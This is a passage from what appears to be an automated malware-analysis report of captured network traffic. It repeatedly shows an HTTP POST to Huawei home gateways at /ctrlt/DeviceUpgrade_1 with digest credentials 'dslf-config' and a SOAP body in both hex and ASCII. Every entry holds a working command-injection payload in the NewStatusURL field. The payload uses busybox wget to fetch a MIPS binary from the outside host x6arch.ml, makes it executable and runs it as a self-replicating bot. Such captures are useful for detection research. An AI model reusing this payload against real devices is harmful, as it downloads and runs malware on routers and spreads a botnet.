61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 